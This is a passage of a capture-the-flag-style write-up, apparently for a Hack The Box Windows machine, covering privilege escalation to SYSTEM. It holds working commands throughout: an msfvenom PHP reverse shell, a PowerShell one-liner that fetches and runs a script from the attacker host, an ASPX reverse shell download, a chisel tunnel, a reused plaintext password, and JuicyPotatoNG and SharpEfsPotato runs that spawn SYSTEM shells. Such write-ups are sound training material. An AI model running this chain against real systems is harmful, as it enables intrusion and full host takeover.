0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Privilege Escalation</span></span></h2><div id="https://www.notion.so/970a4ff4cf354a75884003d860c824bc" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Gaining execution as C.Bum</strong></span></span></p></div><div id="https://www.notion.so/d14d40e6d9b24f4d941532c93feb1270" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Checking what new privileges we have gained, we see that </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C.Bum</code></span><span class="SemanticString"> can write to the Web share, which contains the files hosted on the website:</span></span></p></div><div id="https://www.notion.so/e942999da72f4cd2860e23a70492d1d0" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment 
SemanticString__Fragment--Code">$ crackmapexec smb 10.10.11.187 -u 'C.Bum' -p 'Tikkycoll_431012284' --shares</code></span></span></p></div><pre id="https://www.notion.so/eb498a74f6304d09982bae3fc4e2a20c" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ,WRITE
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ,WRITE</span></span></span></code></pre><div id="https://www.notion.so/bac29964104d4ce4babff3c943489f92" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">This is great as we have all of the ingredients to gain command execution as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C.Bum</code></span><span class="SemanticString">. We start by generating a PHP reverse shell using </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">msfvenom</code></span><span class="SemanticString"> and uploading it to the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Web</code></span><span class="SemanticString"> share.</span></span></p></div><div id="https://www.notion.so/4d8fe8dfeef245c1a67b1a18a500c601" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ msfvenom -p php/reverse_php LHOST=10.10.14.47 LPORT=6969 -f raw > rawr.php</code></span></span></p></div><div id="https://www.notion.so/68193b49651040c9a28a62db3591fc0a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Next, we set up a listener for an incoming connection:</span></span></p></div><div id="https://www.notion.so/8e79eb70f7cb441b976b6ab13a4562a3" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 6969</code></span></span></p></div><div id="https://www.notion.so/b019ad29a37343a58f4ed98d1c0af779" 
class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Then, we trigger the reverse shell by navigating to the uploaded file on the website. This gives us a primitive shell as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">svc_apache</code></span><span class="SemanticString">.</span></span></p></div><div id="https://www.notion.so/19ef03a254574d3787560bd03bf3357d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ curl http://10.10.11.187/rawr.php</code></span></span></p></div><div id="https://www.notion.so/6da3a82d67fb4a37929888e288ca2a45" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Using </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">conptyshell</code></span><span class="SemanticString">, we can upgrade to an interactive shell as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">svc_apache</code></span><span class="SemanticString">, which will be useful for escalating to </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C.Bum</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/3e8105445dff4906bd149986c9165f01" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment 
SemanticString__Fragment--Code">$ stty raw -echo; (stty size; cat) | nc -lvnp 7777</code></span></span></p></div><div id="https://www.notion.so/6896ad8c8d6d4ce191a3d6bbb759bfcf" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> powershell.exe -c "IEX(IWR http://10.10.14.47:9090/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.47 7777"</code></span></span></p></div><div id="https://www.notion.so/b3e3a6634b274af0b73c4b430d37279f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Finally, we use </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">RunasCs</code></span><span class="SemanticString"> to get a shell as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C.Bum</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/8a57a7152bb14693b714b1134c636f83" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 4747</code></span></span></p></div><div id="https://www.notion.so/c2865abad20f4c6e8686ff390fe37da9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> .\RunasCs.exe C.Bum Tikkycoll_431012284 powershell.exe -r 10.10.14.47:4747</code></span></span></p></div><div id="https://www.notion.so/49b127b41d524bc29744ae26fb189402" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span 
class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Discovering an internal site</strong></span></span></p></div><div id="https://www.notion.so/b322ce6c3c174f5d9af62be6c9bd52da" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We find the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C:\inetpub</code></span><span class="SemanticString"> directory containing a separate IIS site not in production. Looking through </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">netstat</code></span><span class="SemanticString">, we also see that port 8000 is listening. 
This did not show up in our </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">nmap</code></span><span class="SemanticString"> scans before, suggesting it’s likely blocked by the firewall:</span></span></p></div><div id="https://www.notion.so/8de4503b01204c189f20e66d167a3146" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> netstat -a</code></span></span></p></div><pre id="https://www.notion.so/4593e7ae8c6d469387d900de9765ed25" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:80 g0:0 LISTENING
TCP 0.0.0.0:88 g0:0 LISTENING
TCP 0.0.0.0:135 g0:0 LISTENING
TCP 0.0.0.0:389 g0:0 LISTENING
TCP 0.0.0.0:443 g0:0 LISTENING
TCP 0.0.0.0:445 g0:0 LISTENING
TCP 0.0.0.0:464 g0:0 LISTENING
TCP 0.0.0.0:593 g0:0 LISTENING
TCP 0.0.0.0:636 g0:0 LISTENING
TCP 0.0.0.0:3268 g0:0 LISTENING
TCP 0.0.0.0:3269 g0:0 LISTENING
TCP 0.0.0.0:5985 g0:0 LISTENING
TCP 0.0.0.0:8000 g0:0 LISTENING
TCP 0.0.0.0:8080 g0:0 LISTENING
TCP 0.0.0.0:9389 g0:0 LISTENING
...</span></span></span></code></pre><div id="https://www.notion.so/132400bd8e7e4c2e980da5c6977cbce6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Since port 8000 is closed by the firewall, we cannot access this site externally. We will need to forward port 8000 to our local machine through a reverse tunnel. We set up a listener on our end:</span></span></p></div><div id="https://www.notion.so/6a3b9f36b9694523a3fd46db2f97ca83" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ./chisel server -p 9001 --reverse</code></span></span></p></div><div id="https://www.notion.so/b70ff555efa846cda6b7553626397762" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Then, on the victim, we connect the chisel client to our server on port 9001 and reverse-forward the victim’s local port 8000 to port 8000 on our machine:</span></span></p></div><div id="https://www.notion.so/b41a1a0300f649889dc50cb4021d19f4" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> .\chisel.exe client 10.10.14.47:9001 R:8000:127.0.0.1:8000</code></span></span></p></div><div id="https://www.notion.so/d46e09018b9143d8bc01a98eb56e0940" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We can now connect to the site in our browser via http://127.0.0.1:8000/</span></span></p></div><div id="https://www.notion.so/37cb6fdbdad24d85a27aa9495ab15da6" class="Image Image--PageWidth"><figure><a 
href="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F68b66cf0-9891-4937-8f0d-7511403c58d1%2FUntitled.png?width=1203&table=block&id=37cb6fdb-dad2-4d85-a27a-a9495ab15da6"><img src="https://www.notion.so/signed/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F68b66cf0-9891-4937-8f0d-7511403c58d1%2FUntitled.png?width=1203&table=block&id=37cb6fdb-dad2-4d85-a27a-a9495ab15da6" style="width:100%"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/cb40ede7a8bf40ed8ef07565ffaa9b9f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Gaining execution as DefaultAppPool</strong></span></span></p></div><div id="https://www.notion.so/6d75d97006e1430684ffb874d2586d2e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">As the web developer, </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C.Bum</code></span><span class="SemanticString"> can write to the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C:\inetpub</code></span><span class="SemanticString"> directory, so let’s upload an ASPX reverse shell:</span></span></p></div><div id="https://www.notion.so/e9d628b02d904daab6e29ed6a87b06e1" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> Invoke-WebRequest -Uri 'http://10.10.14.47:9090/reverse.aspx' -o 'C:\inetpub\development\reverse.aspx'</code></span></span></p></div><div id="https://www.notion.so/498cb0fe2ab04af0817bfb20eb409c1c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Start a listener on the designated port:</span></span></p></div><div id="https://www.notion.so/8b8bfa8475524e6297abaa15e0387c77" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span 
class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 4242</code></span></span></p></div><div id="https://www.notion.so/8025928dd59447cab9717a99f649367f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">After visiting </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://127.0.0.1:8000/reverse.aspx">http://127.0.0.1:8000/reverse.aspx</a></span><span class="SemanticString">, we get a shell as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">IIS AppPool\DefaultAppPool</code></span><span class="SemanticString">. Let’s see what privileges this account holds:</span></span></p></div><div id="https://www.notion.so/97398a0f99b540c1911d022e9d4983d2" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> whoami /all</code></span></span></p></div><pre id="https://www.notion.so/7b70c20452f942cfb3bf76ac3ab12ae0" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>USER INFORMATION
----------------
User Name SID
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled</span></span></span></code></pre><div id="https://www.notion.so/8a7892d86f654bceb3863bad8b130722" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Privilege escalation by abusing SeImpersonatePrivilege</strong></span></span></p></div><div id="https://www.notion.so/4d64a1bceca94310b8b2153f03895e29" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We see that </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">IIS AppPool\DefaultAppPool</code></span><span class="SemanticString"> holds </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">SeImpersonatePrivilege</code></span><span class="SemanticString">. This lets us escalate to SYSTEM with one of the “Potato” impersonation exploits, which follow this privilege escalation chain:</span></span></p></div><ol class="NumberedListWrapper"><li id="https://www.notion.so/493c95ae7e4c4ccfa0e3dbbd5a75d64c" class="NumberedList" value="1"><span class="SemanticStringArray"><span class="SemanticString">We trick the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">NT AUTHORITY\SYSTEM</code></span><span class="SemanticString"> account into authenticating via NTLM to a TCP endpoint we control.</span></span></li><li id="https://www.notion.so/c163c7f596ee4c4ea52d048af7ea1172" class="NumberedList" value="2"><span class="SemanticStringArray"><span class="SemanticString">We intercept this authentication attempt with a man-in-the-middle listener (several COM servers can be made to authenticate this way, notably the BITS service).</span></span></li><li 
id="https://www.notion.so/c273213b748b4e6890a845cb4be0a6d2" class="NumberedList" value="3"><span class="SemanticStringArray"><span class="SemanticString">Using the intercepted authentication attempt, we locally negotiate a security token for the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">NT AUTHORITY\SYSTEM</code></span><span class="SemanticString"> account using a series of Windows API calls.</span></span></li><li id="https://www.notion.so/eecb541790a34ce29f5be922a890fcaa" class="NumberedList" value="4"><span class="SemanticStringArray"><span class="SemanticString">Leveraging the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">SeImpersonatePrivilege</code></span><span class="SemanticString"> commonly found on service accounts, we impersonate this security token and gain command execution as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">NT AUTHORITY\SYSTEM</code></span><span class="SemanticString">.</span></span></li></ol><div id="https://www.notion.so/0a33560ee2744d90a1790fcb7ed8fbdf" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We begin by uploading an </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">ncat</code></span><span class="SemanticString"> binary onto the host; this will make getting a shell easier later:</span></span></p></div><div id="https://www.notion.so/939dcdaaebe442f0bb0e4744baa7f90c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> Invoke-WebRequest -Uri 'http://10.10.14.47:9090/ncat.exe' -o 'ncat.exe'</code></span></span></p></div><div 
id="https://www.notion.so/d10e62f8d9994fe0b734a635bde25d8d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Then, we start a listener on our machine:</span></span></p></div><div id="https://www.notion.so/aecb9dde6a1a4ca78384620e0e317c48" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 4545</code></span></span></p></div><div id="https://www.notion.so/c87ec1d71b694e288ad52dc666f42527" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Using the JuicyPotatoNG exploit:</span></span></p></div><div id="https://www.notion.so/54299eb986ca46f795b4d6c70d20a6f1" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> .\JuicyPotatoNG.exe -t * -p "C:\Users\Public\Music\ncat.exe" -a "10.10.14.47 4545 -e powershell.exe"</code></span></span></p></div><div id="https://www.notion.so/452c8becb3e049379ef1c44cc94a764e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We can also use SharpEfsPotato, which works because it likewise relies on </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">SeImpersonatePrivilege</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/8a6a17afde4247cc8ad2ca21831637de" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment 
SemanticString__Fragment--Code">> .\SharpEfsPotato.exe -p "C:\Users\Public\Music\ncat.exe" -a "10.10.14.47 4545 -e powershell.exe"</code></span></span></p></div><div id="https://www.notion.so/720c16a5bfd54b41841dd0e3672c86ec" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">If the exploit was successful, we should get a reverse shell as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">NT AUTHORITY\SYSTEM</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/1e1ec69c70a944dc86b5d8b05020f9d5" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> whoami</code></span></span></p></div><pre id="https://www.notion.so/53082639758144f4b79a75e69051e3a3" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>nt authority\system</span></span></span></code></pre><div id="https://www.notion.so/63224947bba3449f8e3beed6d42b5805" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">And that’s it, we can get the root flag!</span></span></p></div><h2 id="https://www.notion.so/ddb87a3903064d76b9926409ce59a755" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/ddb87a3903064d76b9926409ce59a755"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 
3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Resources</span></span></h2><ol class="NumberedListWrapper"><li id="https://www.notion.so/9e4f6c71cb3a49199a87a81bbfb9f656" class="NumberedList" value="1"><span class="SemanticStringArray"><span class="SemanticString">SMB Share – SCF File Attacks - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/</a></span></span></li><li id="https://www.notion.so/f6569abf27a044fb9745d36708093659" class="NumberedList" value="2"><span class="SemanticStringArray"><span class="SemanticString">MSFVenom Reverse Shell Payload Cheatsheet - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/">https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/</a></span></span></li><li id="https://www.notion.so/5d743aa93fab456ca8d34b3aaeff611c" class="NumberedList" value="3"><span class="SemanticStringArray"><span class="SemanticString">aspx-reverse-shell - ASPX Reverse Shell - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx">https://github.com/borjmz/aspx-reverse-shell</a></span></span></li><li id="https://www.notion.so/5210209eec144dcf84aa1228755292da" class="NumberedList" value="4"><span class="SemanticStringArray"><span class="SemanticString">Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/">https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/</a></span></span></li><li id="https://www.notion.so/602e1e16f70f4d4ab34e52949be5ca2e" class="NumberedList" value="5"><span class="SemanticStringArray"><span class="SemanticString">Potatoes - Windows Privilege Escalation - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://jlajara.gitlab.io/Potatoes_Windows_Privesc">https://jlajara.gitlab.io/Potatoes_Windows_Privesc</a></span></span></li><li id="https://www.notion.so/5d01ff4759aa47f0b418182db8c3a473" class="NumberedList" value="6"><span class="SemanticStringArray"><span class="SemanticString">JuicyPotatoNG - Another Windows Local Privilege Escalation from Service Account to System - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/antonioCoco/JuicyPotatoNG">https://github.com/antonioCoco/JuicyPotatoNG</a></span></span></li><li id="https://www.notion.so/e4484366cf644a8597bb00a9346f08c9" class="NumberedList" value="7"><span class="SemanticStringArray"><span class="SemanticString">SharpEfsPotato - Local privilege escalation from SeImpersonatePrivilege using EfsRpc - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/bugch3ck/SharpEfsPotato">https://github.com/bugch3ck/SharpEfsPotato</a></span></span></li></ol></article>
<footer class="Footer">
<div>samiko@127.0.0.1~$</div>
<div>·</div>
<div>Powered by <a href="https://github.com/dragonman225/notablog" target="_blank" rel="noopener noreferrer">Notablog</a>.</div>
</footer>
</body>
</html>